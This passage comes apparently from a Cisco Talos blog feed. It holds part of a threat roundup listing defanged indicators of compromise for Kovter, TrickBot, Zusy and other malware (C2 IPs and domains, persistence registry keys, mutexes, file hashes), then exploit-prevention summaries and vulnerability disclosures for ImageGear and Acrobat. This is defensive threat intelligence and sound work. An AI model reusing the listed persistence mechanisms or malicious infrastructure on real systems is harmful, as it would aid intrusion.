208[.]83[.]223[.]34	22
194[.]109[.]206[.]212	27
154[.]35[.]32[.]5	25
171[.]25[.]193[.]9	17

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
ipecho[.]net	36
ikit[.]blasters[.]biz	2
itud[.]jordaust[.]biz	1
icev[.]blasters[.]biz	1
eqak[.]blasters[.]biz	1
esykowyx[.]blasters[.]biz	1
ycyzacuk[.]blasters[.]biz	1
imivutymucu[.]blasters[.]biz	1
akiso[.]blasters[.]biz	1
overypubu[.]blasters[.]biz	1
yxaratdti[.]blasters[.]biz	1
iraqrlan[.]blasters[.]biz	1
ymex[.]blasters[.]biz	1
ajevareda[.]blasters[.]biz	1
ytosonyg[.]blasters[.]biz	1
inuxaqwken[.]blasters[.]biz	1
ydufujkse[.]blasters[.]biz	1
oxunynaduba[.]blasters[.]biz	1
ogylipympvy[.]blasters[.]biz	1
ikawysal[.]blasters[.]biz	1
asasexstab[.]blasters[.]biz	1
yslx[.]blasters[.]biz	1
ipel[.]blasters[.]biz	1
axsrf[.]blasters[.]biz	1
ixetehac[.]blasters[.]biz	1

*See JSON for more IOCs

Files and or directories created	Occurrences
%ProgramData%\igudikadilejogic\00000000	20
%ProgramData%\igudikadilejogic\01000000	20
%ProgramData%\igudikadilejogic\02000000	20
%ProgramData%\igudikadilejogic	20
%ProgramData%\owegidamivejedir	1
%ProgramData%\owegidamivejedir\otopevic	1
%ProgramData%\owegidamivejedir\acopaqic	1
%ProgramData%\owegidamivejedir\ykopapic	1
%ProgramData%\uciqelufyjyryluj	15
%ProgramData%\uciqelufyjyryluj\emugavat	15
%ProgramData%\uciqelufyjyryluj\atugolat	15
%ProgramData%\uciqelufyjyryluj\ifugupat	15
%SystemRoot%\<random, matching [a-z]{8}>.exe	36

File Hashes

01966d2f6ffc32e55ae9cf61192b45d79c9dea2f83223c1ed91fac631408f82a 0d7ca73038b630871bf332e06fa6efcdd8be9bd78fa9be3d09561eb25ab13970 15cfebd8e3941b8079a277535c7cd7487e10d0e5068a7c14d9e2a3056408f419 1ae503736b88bac3f50e9b537483c77cfe320ff6af1164c330b6c2647a480703 1d140e68d59e321066c64b4b8aa17ba676bfaf0e27a658e33f6d20b1c14d7e15 21fa344b6cbba9265353a5b9d1581a377c93e3896d1bd958ba2afb3c292bd168 24836009269f540fde8aa4d74b967a22c390042a30a76a124614ea8e2689ab8d 2bc36dd8f4c9207dcd4e66f8355adaa9fdf9037a0b6b7905512430d46e721947 2d08575cc2db1913c3ca603d3e528ccca990ebde7282d2e259ab85d7c51346b2 3275ad7d7eca08eb0e7109ba1eae744ad07b934e2c35b222bf4f4cfd1601cc29 35bc364d8460264beaaf89237901a720b546fec6a22cbeb166c4e49db6b6e44a 3d197b4896788463b4ce031cc6bb2c5f5ec3b987ee4e83f205cafbcaab384149 3ed3efa6bfc3da524a75013b03985098309ff8871d87e50a6c9b5cad50a7a115 45fa0f900980addac5bf4a528c805355ec8f3edebdf4f36d74d6498beb2f9e90 4794db3d19d99b81c31ab65b06568dc782b52ff80e6aa55a351a89613c3db86f 4ae3784d564c4558e3ea99b80cea23a8373d5f3ada449de72c08b2e95835868b 50d2e30bd801d5bd806d9c85abff75614d9d8d592b322d8fe5f9df2455bc5b0b 53d3e642d001fb563a21b0f0a28748d6ae26ad59b100ee1ba8cf10ec9e390f1c 55124c96c858d5c8ce6d233487a8aa26e8138f7871033e679c59c1dc114d1eb9 58866f02555d41c0a8299275ca036fe7c47553a6615e955e935675e53b0f49af 59c1ad24e09414391265b638fa32b743cf3e2097013eead30e47db9e02f3fbc2 5dc00ea3e7d3b2b9a239ba77525cbf6dc5ecebd1f9d97c25f884dabf043c5134 5ff54a15b800aba735883b03ab68cede13dc0bfbfcc56501d9ac26e9f4d1275c 610027ff0e1826f4af1539ae7142cdb355f255a8e27b0705cbb4e96f3e727613 7305660e95ca3fdcce3b8be49e6d8a6c9f61aa1162ce4b77c1cd06e2fbad6b71

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Win.Malware.Kovter-7571676-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE Value Name: DisableOSUpgrade	25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE Value Name: ReservationsAllowed	25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: 656f27d6	25
<HKCU>\SOFTWARE\3A91C13AB1 Value Name: 656f27d6	25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE	25
<HKCU>\SOFTWARE\3A91C13AB1	25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1	25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE	25
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: 01b2a448	21
<HKCU>\SOFTWARE\3A91C13AB1 Value Name: 01b2a448	21
<HKLM>\SOFTWARE\WOW6432NODE\K6TWCT Value Name: 6wRxA9ZQL	1
<HKLM>\SOFTWARE\WOW6432NODE\K6TWCT Value Name: cBr568g	1
<HKCR>\RAVIGL4M	1
<HKCR>\RAVIGL4M\SHELL	1
<HKCR>\RAVIGL4M\SHELL\OPEN	1
<HKCR>\RAVIGL4M\SHELL\OPEN\COMMAND	1
<HKCR>\.W5PHE	1
<HKLM>\SOFTWARE\WOW6432NODE\7OGGSL Value Name: itYx4Vw	1
<HKCR>\LH8Y07\SHELL\OPEN\COMMAND	1
<HKLM>\SOFTWARE\WOW6432NODE\7OGGSL Value Name: 4mXmspx53	1
<HKCR>\.JG2BV	1
<HKLM>\SOFTWARE\WOW6432NODE\6381BA49F616F0D299E6	1
<HKLM>\SOFTWARE\WOW6432NODE\GQSXMYCRDP	1
<HKLM>\SOFTWARE\WOW6432NODE\6381BA49F616F0D299E6 Value Name: 013E202B8A3B2DA1	1

Mutexes	Occurrences
B3E8F6F86CDD9D8B	25
A83BAA13F950654C	25
EA4EC370D1E573DA	25
Global\7A7146875A8CDE1E	25
Global\ServicePackOrHotfix	4
16194C57FC116A4A	1
Global\C50FA8B86824EC18	1
9A64C6027FF2B729	1
871D8E9395649C20	1
Global\FA5C6929342EC8E3	1
4BAFA1398EB6B247	1
D12FD5C5B231ABC9	1
BBBF5BD15C2A2B8B	1
Global\704022EE540B2F4C	1
67B0ADCC98BB6618	1
53DF59FF587E423B	1
Global\8F98C5D480837CFA	1
Global\DA02B03F2C04CB99	1
170B5BC07C6A1E73	1
E5F0E11301A9BCDE	1
Global\6B1242F27DA8C7C4	1
6154888E137CF66E	1
1744E94C489AE9C9	1
Global\3535E8BAFCF21A1D	1
7EB500E221ADC4FC	1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
23[.]10[.]193[.]233	6
23[.]10[.]207[.]183	7
173[.]201[.]146[.]128	7
104[.]43[.]195[.]251	3
104[.]40[.]211[.]35	2
54[.]54[.]193[.]128	1
115[.]76[.]165[.]127	1
204[.]15[.]35[.]182	1
189[.]113[.]72[.]33	1
70[.]178[.]183[.]128	1
113[.]181[.]187[.]227	1
106[.]106[.]188[.]160	1
36[.]207[.]228[.]85	1
117[.]116[.]105[.]163	1
4[.]213[.]232[.]24	1
23[.]154[.]45[.]79	1
89[.]72[.]221[.]41	1
175[.]91[.]106[.]140	1
195[.]107[.]81[.]250	1
182[.]68[.]221[.]59	1
51[.]183[.]235[.]214	1
205[.]182[.]45[.]214	1
20[.]169[.]182[.]215	1
8[.]51[.]40[.]103	1
196[.]207[.]144[.]60	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
find-dentalimplants[.]com	25
e10088[.]dspb[.]akamaiedge[.]net	7
e3673[.]dspg[.]akamaiedge[.]net	7
www[.]swsoft[.]com	1
rolfrosskopf[.]de	1
www[.]virtuozzo[.]com	1
littleauggie[.]com	1

Files and or directories created	Occurrences
%APPDATA%\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\runme.exe	7
%System32%\WindowsPowerShell\v1.0\about_special_characters.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_split.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_switch.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_type_operators.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_types.ps1xml.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_variables.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_while.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\about_wildcards.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\default.help.txt (copy)	4
%System32%\WindowsPowerShell\v1.0\getevent.types.ps1xml (copy)	4
%System32%\WindowsPowerShell\v1.0\powershell.exe (copy)	4
%System32%\WindowsPowerShell\v1.0\powershell.exe.mui (copy)	4
%System32%\WindowsPowerShell\v1.0\powershell_ise.exe (copy)	4
%System32%\WindowsPowerShell\v1.0\powershell_ise.resources.dll (copy)	4
%System32%\WindowsPowerShell\v1.0\pspluginwkr.dll (copy)	4
%System32%\WindowsPowerShell\v1.0\pwrshmsg.dll (copy)	4
%System32%\WindowsPowerShell\v1.0\pwrshsip.dll (copy)	4
%System32%\WindowsPowerShell\v1.0\types.ps1xml (copy)	4
%System32%\WsmAuto.dll (copy)	4
%System32%\WsmPty.xsl (copy)	4
%System32%\WsmRes.dll (copy)	4
%System32%\WsmSvc.dll (copy)	4
%System32%\WsmTxt.xsl (copy)	4
%System32%\WsmWmiPl.dll (copy)	4

*See JSON for more IOCs

File Hashes

072035cc5fd36e5a21299e4c300311dfaed05b680f7b7e8ccb5d4212fd638712 080de2ac18189ab84019a22f5b7d5d49f087db70a4b52514961acf92ce302946 0a69ad9ef0cf4c9c908e70cc905836fb3e268f6971cc7b5f624f6fc3d895b9cf 1500979f9783b9f49dee8769874d5b23538323d2b483d9997304a619a527bae9 1fcfd76d6196ae6503fce812aff4b24fa498ee5d53090c74894881a057f05a2b 2563ce697e2da03842e74a292b82e2159ca18790e3921a9914a3383a35227fc9 2593888c917bccb77ef2b66467dce8ba0c17319a7f0e403fb5b6bff7be9f969f 262ca735f83655220d16258371d7d8ab50a84978185e7885a15d3cbc2b8c9d93 279ec147df4ab831ed8e3c9981647f21fa264544245c188d39bf3942e2907eba 2875a1bab3f9d8134995621a358fb158a1b254044177276fa6fd90e711c974b2 2bd029e950c1a626d5c979a1a1af238711da6af5cc84058ca8363ab4d5b0e9ba 2ca80804b8ec61c82e050c0eaf62166a0c313ee3adc1b28d03586a4a5227797a 2e42247fc678aa01b440958456b7f232e71775259c54bc9202b730d5a4e76bcc 2f08d47ecf5c2656ed75786d82b1d5a5388699f1533a9c8c91274dab6c085523 38c3aa03de00f8fc19121cd5ffb8fda9babecb621541d48cf4a3640e8f657e9f 3b4c1abc83f05a1a2167510a78b6e32027c69e0fca9d3dc31668b81ea9aff937 3b74d8005163c38c1c1187cc914632dda1fc530821d25839c4b41e08ee626641 3bb4032f62824b803bc6c63c0e92f7d1117699585375e879b24ed392754a1c6e 458f6e2b8a63b419b9f47ef20b1dd0e3a6652d06100c30a0f031b7e84e48e4b9 4b1977f5f8bd5108f8b30e827aea6f536417db02ba087698a44142f18c2307b0 50dfd29d9a7ca4f48e04c015b93fa05d28416fe84b9422669238e1b6089b9ca3 51df5522ddedb5bec493acc2c4ffb8642d3a9e8c6a0d7258454bf2ff8398697a 5a0ca2319596e3b4d353cc091d8d959eafae9eb0c4bf2116256e6bab2909d75e 5da7a9fd096ffe66991211b4556352e58d177e72dbe57cd84269c0bded5396ec 5ebd2eaa37527dafa68105ededbc8304472c0a25be6b7e5d606c0deab526b07c

*See JSON for more IOCs

Coverage

Product	Protection
AMP	N/A
Cloudlock	N/A
CWS	N/A
Email Security	N/A
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

ThreatGrid

Umbrella

---

Win.Dropper.TrickBot-7577793-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Value Name: Blob	3
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE Value Name: Blob	2

Mutexes	Occurrences
Global\316D1C7871E10	47
Global\785161C887210	44

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
216[.]239[.]32[.]21	4
216[.]239[.]34[.]21	4
176[.]58[.]123[.]25	3
216[.]239[.]36[.]21	4
216[.]239[.]38[.]21	3
104[.]20[.]17[.]242	2
116[.]203[.]16[.]95	2
104[.]20[.]16[.]242	2
190[.]214[.]13[.]2	28
181[.]113[.]28[.]146	7
181[.]140[.]173[.]186	24
45[.]125[.]1[.]34	5
52[.]206[.]178[.]1	1
54[.]235[.]220[.]229	2
54[.]235[.]203[.]7	1
198[.]8[.]91[.]10	7
82[.]146[.]62[.]52	8
5[.]182[.]210[.]246	6
5[.]182[.]210[.]226	4
34[.]198[.]132[.]204	1
51[.]89[.]115[.]116	5
85[.]204[.]116[.]237	10
93[.]189[.]42[.]146	3
194[.]87[.]238[.]87	3
146[.]185[.]253[.]18	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
www[.]myexternalip[.]com	2
ident[.]me	3
myexternalip[.]com	6
icanhazip[.]com	4
ip[.]anysrc[.]net	2
api[.]ip[.]sb	5
ipecho[.]net	4
checkip[.]amazonaws[.]com	3
wtfismyip[.]com	1
api[.]ipify[.]org	4
ipinfo[.]io	5
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org	32

Files and or directories created	Occurrences
%APPDATA%\windirect	8
%APPDATA%\windirect\settings.ini	8
%System32%\Tasks\Windows .Net library core	39
%APPDATA%\netwinlib	39
%APPDATA%\netwinlib\data	39
%APPDATA%\netwinlib\settings.ini	39
%SystemRoot%\Tasks\Windows .Net library core.job	25
%APPDATA%\windirect\data	8
%System32%\Tasks\Windows Direct core tools	8
%SystemRoot%\Tasks\Windows Direct core tools.job	8
%APPDATA%\netwinlib\88f4d8d02c72f50d136c15678cf3be9e.exe	1
%APPDATA%\NETWINLIB\<original file name>.exe	39
%APPDATA%\WINDIRECT\<original file name>.exe	8

File Hashes

0a9f9afb0da70420f5b3bb0122f8a3e61cefa5e3b46ba0b22105861ccb4c4731 0bb38dd296227bd17fab03f287075d6d88979d9a7c0f2260900d6c79be113ed6 0c7358921c14cf5e27e1cc7522379f53b114ada048304389e2fcdd821437dcfa 0eefd7ae0d678d8e9426a3f2344baea842b09d9f60f23564e9ca38b36a2c7866 15a808f1d972bd04819ce062bfca15af6a3defc7434a4cd1df0d0f557f0b9244 19038675ae06629f0d1c69226d079a8bab2781c0531175e80edef91a1ce9a80d 1c8919240e4882c3bb261ebe3a58b950e155ff022816dbcb1c1647413f7ac82d 1cc919c69b243005688f45f53418b58ea990a40e8527aa273b797c58a592f6ad 228e28941d69b5f2a1dc9607e91f2313e4843fe4fe77e8d246c9121271012f19 278605aa9843e8eabd5e7cdc83de8a7eeb76c29a19bb41f88bed78f844d94425 2fea0302c8ffa171845092e26e5d22d92eacaa2f32ef8e0149c5480b39eb567b 329f07a624ed34bda1aaabe0e867016862937b6f08bcfa3ae6d2eeee266df41b 3a77c6f027d54b14417be9380c0e190302d98a437f7fde23cc878b2cf62d7832 3e37550017efa6c92c0060a8a5733f8b3d110ecee14d5f5e8be9a66d9dc09af1 43dc628e385c2b79471a052fbe8ad0a011301b5f56231c01f1a8aa0422482721 46d3e013654582412c2b81b841d0b9cb9baa049e3b8e62a447ac656173fc964a 47b5bef23c6129244b84a4774785c48daad1591d253001723279b180ec828962 54b553f3ef10badaccb9ef6dff73c4c6f29a35685694e6afa8d90643acd78791 648dd27a4affa4eb955935a1b66a72000fd2035a1c1aff4e640339534b767e00 682df81e000e3e2bfc4fbdb6b9ff7bdb6020ee6b1388ab3bc95be66bae65ae4a 6d2788dfa3f6e5a054eda08200a97664368b9874350555b65f4319088f1d2e06 7364613d95319976a837e6b5df8bbcb8a9e94125b816253ff6ab523f55c98c77 74e990e02d30c7ddfddb15d7411124e46da01d486abc0f7439559bd19e56ad12 7747552af8960acf1fc3090d1812c19dc38d8cf015846dcefd88c12dec0afc9d 7eb312b1de92aff32d189eef03650ba2b9bd710ca337bf24c2ed46dcdedcedc7

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA

Screenshots of Detection

AMP

ThreatGrid

---

Win.Packed.Zusy-7572206-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: 36412	6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	1
<HKCU>\SOFTWARE\ATLTLCN	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841}	1
<HKCU>\SOFTWARE\ATLTLCN Value Name: ServerStarted	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: WmiPrv	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841} Value Name: StubPath	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: WmiPrv	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: WmiPrv	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: Load	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: Load	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: Shell	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: Shell	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WmiPrv	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: WmiPrv	1
<HKCU>\SOFTWARE\ATLTLCN Value Name: InstalledServer	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: FIXMAPI 1.0 MAPI Repair Tool	1

Mutexes	Occurrences
XTREMEUPDATE	1
1009299684	6
2562100796	6
lol	6
mjwzCaJUioOZIIF	2
ATLtlcn	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
40[.]90[.]247[.]210	3
40[.]91[.]124[.]111	2
20[.]45[.]1[.]107	1
138[.]197[.]221[.]199	1
192[.]40[.]57[.]179	2

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
www[.]update[.]microsoft[.]com[.]nsatc[.]net	6
infernushosting[.]net	6
bighecks[.]org	1
pen[.]is-certified[.]com	1

Files and or directories created	Occurrences
%TEMP%\x.html	1
%APPDATA%\Update	1
%ProgramData%\Local Settings	6
%ProgramData%\Local Settings\Temp	6
%ProgramData%\Local Settings\Temp\msuwavie.pif	1
%ProgramData%\Local Settings\Temp\msariiz.scr	1
%ProgramData%\Local Settings\Temp\msvbazez.scr	1
%ProgramData%\Local Settings\Temp\msvcais.com	1
%APPDATA%\Update\Javaupdate.exe	1
%APPDATA%\Mining	1
%ProgramData%\Local Settings\Temp\msabomu.com	1
%ProgramData%\Local Settings\Temp\msezizyf.exe	1
%APPDATA%\Mining\coin-miner.exe	1
%APPDATA%\Microsoft\Windows\ATLtlcn.cfg	1
%APPDATA%\WmiPrv	1
%APPDATA%\WmiPrv\WmiPrv.exe	1
%APPDATA%\Microsoft\Windows\ATLtlcn.dat	1
%HOMEPATH%\Music\fixmapi.exe	1
%HOMEPATH%\Music\wdmaud.exe	1
%TEMP%\msaaqinu.com	1
%TEMP%\msitezcn.scr	1
%TEMP%\msavoyauu.pif	1
%HOMEPATH%\My Documents\My Music\fixmapi.exe	1
%HOMEPATH%\My Documents\My Music\wdmaud.exe	1
%TEMP%\msqwwu.exe	1

*See JSON for more IOCs

File Hashes

18226c65547a1de83f00028171b8948b5c9fb33d194afd1f3f92fa5c90fdaf45 298b5a668c186cdf8fde2dc29e38d0921734b3322fe6191dabd79a12ce3440bd 2a57280bffa1d45f7510ed16d397f568395d057f10c8de214e590f458f465682 412316ac563c1028acf3d41652c670f29e60636198a304f5e560ac87ab7b4aaa 4a8dfad4d821e5f74b9f11ff82131fd533b14d4039ab1d52164a73fe08b5f05a 66bec557cf492d9014a3be80c31d53b29bc78e98d9485ef4f78de853e194c57b a71a598119ebb1598db7857d9619b71e21a447f5aec4de74fc112d4d09b90025 ba02e51162dd1ec07a955f706d09dcfe5a860adaae0e990fe1fc3809d28c0143 bbbfdd70c93b7728b38eb826b85c70e212d9ca355347fa61f10bc6488103f650 d499aaf6b7e484b7a5bf76df7a9fef3fc48e42a107020196b9c96e8637dab8db

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (5540)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Process hollowing detected - (252)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.

Gamarue malware detected - (177)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Kovter injection detected - (142)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Installcore adware detected - (103)

Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

Excessively long PowerShell command detected - (100)

A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Dealply adware detected - (58)

DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Corebot malware detected - (15)

Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

Trickbot malware detected - (9)

Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.

Reverse http payload detected - (6)

An exploit payload intended to connect back to an attacker controlled host using http has been detected.

Vulnerability Spotlight: Accusoft ImageGear library code execution vulnerabilities

February 10, 2020, 7:27 am

≫ Next: Introducing Cisco Talos Incident Response: Stories from the Field

≪ Previous: Threat Roundup for January 31 to February 7

$

0

0

Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered three code execution vulnerabilities in Accusoft ImageGear. The ImageGear library is a document-imaging developer toolkit to assist users with image conversion, creation, editing and more. There are vulnerabilities in certain functions of ImageGear that could allow an attacker to execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update (link will generate a download) is available for affected customers.

Vulnerability details

Accusoft ImageGear TIFF TIF_read_stripdata code execution vulnerability (TALOS-2019-0972/CVE-2019-5187)

An exploitable out-of-bounds write vulnerability exists in the TIF_read_stripdata function of the igcore19d.dll library of Accusoft ImageGear 19.5.0. A specially crafted TIFF file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer size computation code execution vulnerability (TALOS-2020-0986/CVE-2020-6063)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Accusoft ImageGear PCX uncompress_scan_line buffer copy operation code execution vulnerability (TALOS-2020-0987/CVE-2020-6064)

An exploitable out-of-bounds write vulnerability exists in the `uncompress_scan_line` function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 19.5.0 of Accusoft ImageGear is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52490 - 52493, 53015, 53016, 53032 - 53035

Introducing Cisco Talos Incident Response: Stories from the Field

February 10, 2020, 8:25 am

≫ Next: Vulnerability Spotlight: Information leak vulnerability in Adobe Acrobat Reader’s JavaScript function

≪ Previous: Vulnerability Spotlight: Accusoft ImageGear library code execution vulnerabilities

$

0

0

By Jon Munshaw.

As another way of bringing our boots-on-the-ground intelligence to defenders, customers and users, we are introducing a new video series called "Cisco Talos Incident Response: Stories from the Field."

In each entry, a CTIR team member will cover one specific incident or lesson that they feel can be applicable to the everyday defender. First up is Pierre Cadieux, who recalls a recent incident at a health care company. He walks through the containment of the attack and recounts some lessons from that event he shares with other customers.

You can watch the full video above. To learn more about Talos Incident Response, click here.

Vulnerability Spotlight: Information leak vulnerability in Adobe Acrobat Reader’s JavaScript function

February 11, 2020, 8:19 am

≫ Next: Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage

≪ Previous: Introducing Cisco Talos Incident Response: Stories from the Field

$

0

0

Aleksandar Nikolic of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered an information leak vulnerability in Adobe Acrobat Reader. Acrobat supports a number of features, including the ability to process embedded JavaScript. An attacker could trigger this vulnerability by tricking a user into opening a malicious file or web page with embedded JavaScript in a PDF. The attacker could then gain access to sensitive information, which could then be used in additional attacks.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC JavaScript field name information leak (TALOS-2019-0959/CVE-2020-3744)

A specific JavaScript code embedded in a PDF file can lead to an information leak when opening a PDF document in Adobe Acrobat Reader DC, version 2019.021.20048. This could allow an attacker to view sensitive information, which could be abused when exploiting another vulnerability to bypass mitigations. The victim would need to open the malicious file or access a malicious web page to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 2019.021.20048 of Adobe Acrobat Reader DC is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52331, 52332

Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage

February 11, 2020, 11:53 am

≫ Next: Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

≪ Previous: Vulnerability Spotlight: Information leak vulnerability in Adobe Acrobat Reader’s JavaScript function

$

0

0

By Jon Munshaw.

